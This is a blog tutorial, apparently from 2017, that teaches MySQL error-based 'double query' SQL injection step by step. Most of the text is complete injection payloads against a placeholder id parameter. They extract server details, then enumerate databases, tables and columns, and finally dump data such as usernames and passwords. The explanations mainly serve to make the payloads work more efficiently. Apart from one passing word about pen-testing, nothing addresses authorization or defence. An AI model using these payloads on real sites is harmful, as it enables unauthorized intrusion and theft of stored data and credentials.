Tuesday, June 27, 2017
Home / Tutorials / MySql Double Query Sql Injection Tutorial

MySql Double Query Sql Injection Tutorial

Today we will be showing you how to apply a Double Query Sql Injection.

Some people may be wondering, there are many types for Sql Injection methods, and today we will be demonstrating a Double Query SQL Injection, you will use this method mostly when you’re applying:

whatever.com/index.php?id=-myass union select 1,2,3,4,5,6--

No that’s just an example, it can be Union All Select it can be String Injection it can be whatever you want, just, when you do so, it will give you a MySql Error that is similar to the shit in that box down there:

Different Number of Columns

Now I will show you the steps and I will try to explain what’s happening down there and I will also show you what some People uses and what I use (which is actually, the stuff you should use).
Ok, so now, we got this error message “Different Number of Columns”.

 whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(concat(version(),user(),@@hostname,0x7e,@@datadir) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

As you can see, this will show you the Version, the User, the Hostname and the Datadir…

So we got the info, now lets get the Databases…

Many many people use this in all their Sql Injection not only in Double Query : database()
This will only shows you 1 Database… If the Website you’re pen-testing has 10 databases your query is a fail so never use that…

Example for Double Query:

whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

as you can see, the code up there is what a lot of people use, but you shouldn’t

The code below is more efficient:

whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Ok let me explain What is this, and what’s difference…
As you can see with this Double Query we are retrieving schema_name from information_schema.schemata which means ALL THE DATABASES that can be found…

But in this Double Query example that I am using there’s Limits beacuse we are using Concat in place of Group_Concat…

Note: group_concat will group everything all together and all the info will appear at once on the webpage… If you’re using Concat you have to use Limit and the info will appear one by one.

So what to do here, you just have to increase the Limit in the first query which is the one that gets us the Databases the one that contains from information_schema.schemata…

How to increase the Limits? Well Limit 0,1 will show you the first Database, Limit 1,1 will show you the second one, Limit 2,1 will show you the thread, Limit 3,1 will show you the fourth, etc…

[hr]

Note: When you’re using the Basic Sql Injection, code should be, example:

whatever.com/index.php?id=-myass union select 1,2,3,4,5,schema_name,7,8 from information_schema.schemata--

And this will show you ALL THE DATABASES AT ONCE…

Using this code:

whatever.com/index.php?id=-myass union select 1,2,3,4,5,database(),7,8--

will only show 1 Database…

[hr] Ok so now he have all the Databases, lets move on to getting the Tables…

This is what you should use to get the Tables:

whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEX LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Why this one? Firstly because in this one we can choose which Database, same thing, don’t use the codes that only have database(), if you have about 3 databases you should use this code and if you have one database you won’t loose a thing so using this code is always the right thing to do…

Where it says 0xHEX, you should replace that with the HEX of the Database you chose to get it’s tables…

Now let me explain a little bit, as you can see we are getting the Table Names from information_schema.tables where table_schema=0xHEX

Which means we’re getting the Table Names from the Chosen Database…

Now here you also have Limits so don’t forget to increase that or you will only see 1 table…
Now to get the Columns:

 whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x"HEXDATABASE" AND table_name=0x"HEXTABLENAME" LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
 

Now here, it’s just like getting the tables but we’re getting the columns, to get the columns we should also Say from which Table so we just add “And table_name=0xHEXEDTABLENAME”
Surely, you have to put the hex of the Table Name instead of that and Increase the Limits to get all the Columns…
Now lets Retrieve Data from the Columns, that’s the good part :P

Some people use this:

 whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast("tablename"."columnname" as char),0x27,0x7e) FROM "databasename"."tablename" LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
 

So as you can see, the people who uses this code are very detailed… they use tablename.columnname
Why is that weak? firstly no need to write the same thing over and over again because in the same query you’re saying which Table when you write databasename.tablename… Secondly this will only show you the data of 1 column? Why? Why don’t you see the Data of 14213451234 Columns at a time? It’s faster.
Now some people use this one:

whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select concat(username,0x7e,pass,0x7e7e) from "table" limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now this is better, as you can see we are retreiving the Data of more then 1 column at a time which is good but where it says from “table” is the bad thing because you’re not precising which Database and you don’t want to risk that because what if there’s 2 Databases and both of them have the same table name but with different data you will be like owned by yourself…

So here’s what to use:

 whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from database.table limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
 

So why this is better? Firstly because we’re getting Data from more then 1 column at once and secondly because we’re giving the right details to get the right info by using database.table, so we’re just giving it everything the right way…
Some things to remember:

1- Never forget to increase the limits
2- Sometimes you can use Char instead of Hex if it didn’t work but this is very very rare
3- Doing a Sql Injection is simple, you should just understand what you’re typing and pretend you’re talking to somebody…

About FastFlux

Owner of ZeroSecurity, interested in programming, malware analysis and penetration testing. If you would like to write for the ZeroSecurity team, please use the contact form above.

Check Also

Low Level IPhone programming

Video from JailbreakCon Twitter: @JailbreakCon – http://twitter.com/JailbreakCon “Low Level iPhone Programming (And more!)” by winocm [remotely, …